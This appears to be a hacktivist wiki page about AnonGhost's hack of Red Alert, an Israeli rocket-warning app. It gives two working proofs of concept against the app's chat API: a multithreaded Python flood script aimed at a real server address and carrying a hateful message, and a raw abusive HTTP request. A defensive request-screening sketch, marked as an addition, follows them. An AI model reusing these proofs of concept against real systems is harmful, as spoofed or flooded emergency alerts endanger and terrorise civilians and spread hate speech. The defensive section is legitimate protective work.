RedAlert

From Enlace Hacktivista

Hacktivist group AnonGhost hacked Red Alert, an application that Israelis use to be alerted when Hamas performs rocket fire attacks. Using an API vulnerability, the group was able to send red alert messages en masse to anyone and everyone who uses the app, with whatever content they liked.

Explanation of the Hack

POC 1:

import requests
import threading
import time


url = "http://54.214.248.70:80/redalert/and/api/chat.php"
headers = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "User-Agent": "Dalvik/2.1.0 (Linux; U; Android 13; M2101K7BG Build/TP1A.220624.014)",
    "Host": "54.214.248.70",
    "Connection": "Keep-Alive",
    "Accept-Encoding": "gzip",
}


data = {
    "msg": "death to israel",
    "method": "sendmsg",
    "time": "🇵🇸",
    "hash": "f1f416dd17fb4668098a8b02c845021f",
    "token": "fWIzje8JYuI:APA91bGbeHvcsQpsPBucVxgUZcUGIT8ZXBNCKGSNdHmxdI0BfXW-idB6qvFTLZhBBI3jmVdBawsmCSPhkeDD5g_JKz6n7Q3ohltrJOiKHOJl47Sv0417E70hbykh8lfhLvD9_GeTN9Me",
    "ts": "1696713616907",
    "username": "࿕",
}


num_threads = 500  
num_requests = 20000  


def send_request():
    for _ in range(num_requests // num_threads):
        response = requests.post(url, headers=headers, data=data)
        print(response.text)


threads = []
for _ in range(num_threads):
    thread = threading.Thread(target=send_request)
    threads.append(thread)
    thread.start()


for thread in threads:
    thread.join()

POC 2:

POST /redalert/and/api/chat.php?msg=AnonGhost&method=sendmsg&time=7%3A13&hash=52bd01a926202bc0e5e7ba68270e4705&token=FUCKISRAEL&ts=1696720382270&username=AnonGhost&& HTTP/1.1
Host: 54.214.248.70
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
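
From the defender's side, both requests above carry fields a server can check before relaying a message: POC 1 sends an emoji as `time` and repeats the request thousands of times, and POC 2 sends a plain word as `token`. The following screening sketch is an added example, not code from the original page or from the app's developers; the field formats, thresholds, the `SendmsgScreen` class and all sample values are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque

# Assumed formats and limits (illustrative, not taken from the app or its server).
TIME_RE = re.compile(r"\d{1,2}:\d{2}", re.ASCII)           # clock time such as "7:13"
TOKEN_RE = re.compile(r"[\w-]{8,}:[\w-]{100,}", re.ASCII)  # rough push-token shape
MAX_TS_SKEW_MS = 5 * 60 * 1000             # client ts must be within 5 min of server time
WINDOW_MS, MAX_PER_WINDOW = 60 * 1000, 5   # per-source sendmsg budget

class SendmsgScreen:
    """Returns the reasons a sendmsg request should be rejected or alerted on."""
    def __init__(self, registered_tokens):
        self.registered = set(registered_tokens)
        self.recent = defaultdict(deque)   # source address -> recent arrival times (ms)

    def check(self, src, now_ms, params):
        reasons = []
        if not TIME_RE.fullmatch(params.get("time", "")):
            reasons.append("time-format")
        token = params.get("token", "")
        if not TOKEN_RE.fullmatch(token):
            reasons.append("token-shape")
        elif token not in self.registered:
            reasons.append("token-unknown")    # well-formed but never issued to a device
        ts = params.get("ts", "")
        if not (ts.isascii() and ts.isdigit()) or abs(now_ms - int(ts)) > MAX_TS_SKEW_MS:
            reasons.append("ts-skew")
        q = self.recent[src]
        while q and now_ms - q[0] >= WINDOW_MS:
            q.popleft()                        # drop arrivals that left the window
        q.append(now_ms)
        if len(q) > MAX_PER_WINDOW:
            reasons.append("rate")
        return reasons

def demo():
    """Runs constructed requests (placeholder values only) through the screen."""
    now = 1_700_000_000_000
    good = "dev00000001:" + "A" * 140          # constructed, registered
    stray = "dev00000002:" + "B" * 140         # constructed, well-formed, unregistered
    screen = SendmsgScreen([good])
    ok = {"time": "7:13", "token": good, "ts": str(now)}
    emoji = {**ok, "time": "\U0001F1F5\U0001F1F8", "token": stray}
    return {
        "normal": screen.check("198.51.100.1", now, ok),
        "emoji_time": screen.check("198.51.100.2", now, emoji),
        "word_token": screen.check("198.51.100.3", now, {**ok, "token": "NOTATOKEN"}),
        "flood": [screen.check("198.51.100.4", now + i, ok) for i in range(7)][-1],
    }
```

These checks only filter malformed or high-volume traffic; they do not replace authenticating the sender on the server.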

Media Coverage

  1. https://x.com/GroupIB_TI/status/1711234869060358562
  2. https://thecyberexpress.com/redalert-cyberattack-anonghost-nuclear-alerts
  3. https://youtu.be/6zYloNKD-08?si=GIk6CqhPlN0HAotR